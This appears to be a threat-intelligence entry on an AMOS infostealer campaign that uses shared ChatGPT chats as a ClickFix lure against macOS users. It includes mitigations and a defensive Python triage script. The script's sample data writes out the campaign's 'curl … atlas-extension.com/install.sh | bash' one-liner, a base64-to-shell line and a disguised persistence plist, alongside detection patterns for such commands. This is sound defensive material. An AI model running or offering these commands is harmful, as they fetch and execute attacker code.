The AMOS infostealer is piggybacking ChatGPT’s chat-sharing feature | Kaspersky official blog
We break down a new infostealer attack that combines the ClickFix technique with a shared chat containing malicious user guides on the official ChatGPT website.
AI Analysis
Technical Summary
The campaign described by Kaspersky is a social-engineering attack that abuses ChatGPT's chat-sharing feature to host malicious installation instructions for what purports to be ChatGPT Atlas, OpenAI's macOS browser. The attackers buy sponsored Google ads for keywords such as "chatgpt atlas"; the ad lands the victim on a URL under chatgpt.com/share/, that is, a publicly shared ChatGPT conversation. The conversation was prompt-engineered to read as a convincing step-by-step install guide whose key step is to copy a single shell command and paste it into the macOS Terminal.

That command downloads a script from atlas-extension.com, a domain unrelated to OpenAI, and executes it. The script then asks for the user's system password so that it can run with elevated privileges, re-prompting until the entered credentials actually work. With a working password it installs the AMOS (Atomic macOS Stealer) infostealer and a backdoor that survives reboots. AMOS collects browser passwords and cookies from Chrome and Firefox, cryptocurrency wallet data from Electrum, Coinomi and Exodus, TXT, PDF and DOCX files from common user folders, and data from Telegram Desktop and OpenVPN Connect. The backdoor gives the operators remote control of the host beyond the one-time data theft.

This is a variant of the ClickFix technique: no software vulnerability is exploited, and the victim performs the execution step by hand. Hosting the lure on the genuine chatgpt.com domain lends it credibility, and the target audience is macOS users curious about new AI tools and browsers. Because the chain depends entirely on user action, there is no CVE and nothing to patch; the controls that matter are awareness, endpoint detection, and privilege restriction.

The threat highlights the evolving tactics of attackers who use AI platforms and other legitimate services to slip past controls that key on domain reputation.
Potential Impact
For European organizations the AMOS infostealer is first a confidentiality risk, and through its backdoor also an integrity and availability risk. Stolen passwords, cookies, crypto wallets, documents, and messaging-app data translate into account takeover, financial loss, intellectual-property exposure, and operational disruption; stolen browser cookies in particular let an attacker resume authenticated web sessions without the password or a second factor. The persistent backdoor gives attackers a foothold for lateral movement, espionage, or ransomware deployment. Organizations with macOS endpoints are exposed, especially where employees experiment with AI tools or install new software on their own. Hosting the lure on a legitimate domain lowers user suspicion and raises the infection rate. A breach resulting from an AMOS infection can bring GDPR penalties, reputational damage, and recovery costs. The campaign also underscores how hard it is to defend against social engineering that rides on emerging technology and user trust; without awareness and endpoint protection, European businesses risk significant data compromise and operational impact.
Mitigation Recommendations
1. Conduct targeted user awareness training on the danger of running unsolicited shell commands, whatever the delivery channel (web page, chat, e-mail), even when the page sits on a trusted domain such as chatgpt.com. The concrete rule to teach: a legitimate macOS application installs from a downloaded .dmg/.pkg or the App Store; an "install guide" whose step is to paste a Terminal one-liner is the tell.
2. Deploy macOS endpoint protection that detects known infostealers such as AMOS and blocks or alerts on suspicious script execution (shells fed by curl/wget pipelines, scripts run from /tmp or hidden home directories).
3. Enforce least privilege: give day-to-day accounts standard (non-admin) rights. sudo on macOS only succeeds for members of the admin group, so a standard user who types their password into the attacker's prompt still cannot hand the script root; the stealer is then limited to what that user's own account can read.
4. Monitor DNS and egress for the domain named in the report (atlas-extension.com) and block or alert on it, treating it as one sample indicator: ClickFix infrastructure rotates quickly, so pair the blocklist with behavioural detection rather than relying on it.
5. Have users route unfamiliar installation instructions through IT before running them; asking an AI assistant to explain a suspicious command first is a useful habit, but a shared chat is not a trusted source just because it is hosted on chatgpt.com.
6. Use URL filtering and ad blocking to reduce exposure to malicious sponsored search results.
7. Regularly audit macOS hosts for persistence: LaunchAgents and LaunchDaemons under ~/Library and /Library, login items, cron jobs, and any program running from temporary or hidden directories.
8. Promote a culture in which employees report suspicious instructions or unexpected password prompts without fear of blame.
9. Work with threat-intelligence providers to track new social-engineering techniques built on AI platforms.
10. Deploy EDR with behavioural analytics to catch anomalous command execution (Terminal spawning curl piped into bash, repeated credential prompts) and bulk reads of browser-profile and wallet directories followed by outbound transfers.
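As a worked example covering both the attack chain in the technical summary (a pasted one-liner that fetches and runs a script, then installs persistence) and mitigation items 7 and 10 above, here is a small Python triage script for macOS artifacts. It is added here and is not code from Kaspersky or from the campaign: the sample history lines and LaunchAgent plists are constructed for the demo, the regular expressions are my own heuristics, and the only campaign-specific indicator it knows is the atlas-extension.com domain named in the report.

```python
"""Triage macOS artifacts for ClickFix-style download-and-run commands and
suspicious launchd persistence.

Added example; not code from the Kaspersky article or from the campaign.
Sample inputs are constructed. Real data comes from ~/.zsh_history,
~/.bash_history, EDR process telemetry, ~/Library/LaunchAgents/*.plist,
/Library/LaunchAgents/*.plist and /Library/LaunchDaemons/*.plist.
"""
import io
import plistlib
import re

# A fetch tool whose output is piped straight into a shell (the pasted one-liner).
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|)sh\b")
# Fetched content executed via command substitution: sh -c "$(curl ...)".
SUBST_EXEC = re.compile(r"(\$\(|`)\s*(curl|wget)\b")
# Decode-then-run obfuscation: base64/xxd output piped into a shell.
DECODE_EXEC = re.compile(r"\b(base64\s+(-d|--decode|-D)|xxd\s+-r)\b[^|]*\|\s*(ba|z|)sh\b")
# Indicator from the article; extend from threat intel (assumption: reader maintains it).
KNOWN_BAD_DOMAINS = {"atlas-extension.com"}

# launchd jobs should not run from temp, shared, or hidden home directories.
SUSPICIOUS_PATH = re.compile(r"(^|\s)(/tmp/|/private/tmp/|/var/tmp/|/Users/Shared/|/Users/[^/]+/\.[^/ ]+/)")
SUSPICIOUS_TOKENS = ("curl ", "wget ", "base64", "osascript", "nohup ", "| sh", "| bash")

ZSH_EXTENDED = re.compile(r"^: \d+:\d+;")  # ': 1733731200:0;cmd' with EXTENDED_HISTORY


def strip_zsh_history(line: str) -> str:
    """Remove the zsh extended-history timestamp prefix, if present."""
    return ZSH_EXTENDED.sub("", line).strip()


def flag_command(cmd: str) -> list[str]:
    """Reasons a command line looks like ClickFix tradecraft (empty list = clean).

    Triage signals, not verdicts: legitimate installers also use
    'sh -c "$(curl ...)"', so findings need a human look.
    """
    cmd = strip_zsh_history(cmd)
    reasons = []
    if DOWNLOAD_EXEC.search(cmd):
        reasons.append("download piped into shell")
    if SUBST_EXEC.search(cmd):
        reasons.append("fetched content run via command substitution")
    if DECODE_EXEC.search(cmd):
        reasons.append("decoded payload piped into shell")
    reasons += [f"known bad domain {d}" for d in sorted(KNOWN_BAD_DOMAINS) if d in cmd]
    return reasons


def flag_launchd_plist(raw: bytes) -> list[str]:
    """Reasons a user/third-party launchd job looks suspicious (empty list = clean).

    Meant for ~/Library/LaunchAgents and /Library/Launch{Agents,Daemons},
    where nothing should carry a com.apple.* label.
    """
    try:
        job = plistlib.load(io.BytesIO(raw))
    except Exception as exc:  # a plist launchd cannot parse is itself odd
        return [f"unparseable plist: {exc}"]
    args = [str(a) for a in job.get("ProgramArguments", [])]
    if "Program" in job:
        args.insert(0, str(job["Program"]))
    cmdline = " ".join(args)
    if not cmdline:
        return ["no program specified"]
    reasons = []
    if SUSPICIOUS_PATH.search(cmdline):
        reasons.append("runs from temp/shared/hidden-home path")
    hits = [t.strip() for t in SUSPICIOUS_TOKENS if t in cmdline]
    if hits:
        reasons.append("arguments contain " + ", ".join(hits))
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad+KeepAlive (restarts if killed)")
    if str(job.get("Label", "")).startswith("com.apple."):
        reasons.append("com.apple.* label outside /System (masquerading)")
    return reasons


def triage(commands, plists):
    """Run both checks; returns {item: reasons} for everything that fired."""
    findings = {}
    for cmd in commands:
        if r := flag_command(cmd):
            findings[strip_zsh_history(cmd)] = r
    for name, raw in plists.items():
        if r := flag_launchd_plist(raw):
            findings[name] = r
    return findings


# ---- constructed sample data (not captured from the campaign) ----
SAMPLE_HISTORY = [
    ": 1733731200:0;ls -la ~/Downloads",
    "curl -fsSL https://atlas-extension.com/install.sh | bash",
    'sh -c "$(curl -fsSL https://example.invalid/setup.sh)"',
    "echo aGVsbG8= | base64 -d | sh",
    "curl -O https://example.invalid/tool.tgz && tar xzf tool.tgz",
]
SAMPLE_PLISTS = {
    "com.apple.update.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.update.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>/Users/alice/.helper/agent &amp;</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    "com.example.sync.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.sync</string>
  <key>ProgramArguments</key><array><string>/Applications/Sync.app/Contents/MacOS/Sync</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

if __name__ == "__main__":
    for item, reasons in triage(SAMPLE_HISTORY, SAMPLE_PLISTS).items():
        print(f"[!] {item}\n    " + "; ".join(reasons))
```

Running it flags three of the five sample commands (the direct pipe to bash with the reported domain, the command-substitution form, and the base64-decode pipe) and the masquerading LaunchAgent, while the plain `curl -O` download and the agent that runs a normal /Applications binary pass. The command-substitution rule will also fire on legitimate installers that use the same shape, which is deliberate: the point is to surface every place a shell was handed remote content so an analyst can confirm the source, not to auto-block.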
Affected Countries
Germany, United Kingdom, France, Netherlands, Sweden, Denmark, Finland, Norway, Switzerland, Belgium
Technical Details
- Article Source: https://www.kaspersky.com/blog/share-chatgpt-chat-clickfix-macos-amos-infostealer/54928/ (fetched 2025-12-09, 1616 words)
Threat ID: 6937ee2327e9f45fce633bc9
Added to database: 12/9/2025, 9:38:43 AM
Last enriched: 1/3/2026, 12:21:59 AM
Last updated: 2/3/2026, 4:08:00 PM